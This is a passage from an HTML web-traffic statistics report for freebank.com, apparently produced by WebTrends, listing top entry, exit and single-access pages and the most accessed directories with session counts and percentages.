<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/regstr.asp?bvid=4933">http://www.freebank.com/regstr.asp?bvid=4933</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopEntry"><!--Resources Accessed::Top Entry Pages--></A>
<!-- WT_H1>Top Entry Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Entry Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the first hit from a user visiting this site. This is most likely the home page but, in some cases, it may also be specific URLs that users enter to access a particular page directly. The percentages refer to the total number of user sessions.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index02.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Top Entry Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Entry Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53.31%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4179</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/editcat.html">http://www.freebank.com/editcat.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.85%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">459</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctsum.asp">http://www.freebank.com/acctsum.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.16%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">405</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/editgrp.html">http://www.freebank.com/editgrp.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">353</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/ccrgstr.html">http://www.freebank.com/ccrgstr.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">203</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/newpay.html">http://www.freebank.com/newpay.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.84%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">145</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/rgstr.html">http://www.freebank.com/rgstr.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.68%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">132</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/xfer.html">http://www.freebank.com/xfer.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.56%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">123</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/statemnt.html">http://www.freebank.com/statemnt.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">118</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/pendbills.html">http://www.freebank.com/pendbills.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.45%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">114</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>79.49%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6231</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopExit"><!--Resources Accessed::Top Exit Pages--></A>
<!-- WT_H1>Top Exit Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Exit Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the pages users were on when they left the site. The percentages refer to the total number of user sessions that started with a valid Document Type. If the session started on a document with a different type (such as a graphic or sound file), the file is not counted as an Entry Page, and the session is not counted in the total.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Top Exit Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Exit Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">38.97%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3054</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">488</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.11%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">401</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.98%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">391</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.76%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">373</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.51%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">354</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.53%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">199</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_books.htm">http://www.freebank.com/nbf_books.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">161</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">159</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbfgad.htm">http://www.freebank.com/nbfgad.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">133</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above (only sessions starting on a valid document type are included)</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>72.9%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5713</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSinglePage"><!--Resources Accessed::Single Access Pages--></A>
<!-- WT_H1>Single Access Pages</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Single Access Pages</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the pages on the site that visitors access and exit without viewing any other page. The percentages refer to the total number of user sessions that started with a valid Document Type. If the session started on a document with a different type (such as a graphic or sound file), the file is not counted as an Entry Page, and the session is not counted in the total<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index03.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 4.1, .8
, .8
</WT_TABLE_STATS -->
<CENTER><B>Single Access Pages</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Single Access Pages</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">50.56%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2937</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">361</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.68%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">330</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.82%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">164</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.94%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_books.htm">http://www.freebank.com/nbf_books.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.85%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">108</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbfgad.htm">http://www.freebank.com/nbfgad.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.61%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.54%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">90</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>78.56%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4563</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopDirectory"><!--Resources Accessed::Most Accessed Directories--></A>
<!-- WT_H1>Most Accessed Directories</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Accessed Directories</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section analyzes accesses to the directories of the site. This information can be useful in determining the types of data most often requested.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index04.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=6 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>6, 2.4, .6
, .6
, .8, .8, .8
</WT_TABLE_STATS -->
<CENTER><B>Most Accessed Directories</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Accessed Directories</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Path to Directory</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Hits</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Hits</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Non Cached %</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Non Cached K Xferred</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/">http://www.freebank.com/</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53776</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85.32%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">88.93%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">735,059K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10312</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_fpclass">http://www.freebank.com/_fpclass</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8365</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56,959K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3635</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/stats">http://www.freebank.com/stats</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">698</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.1%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.41%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19,554K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">159</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_private">http://www.freebank.com/_private</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">80</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.12%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">98.75%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7,131K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD></TR>
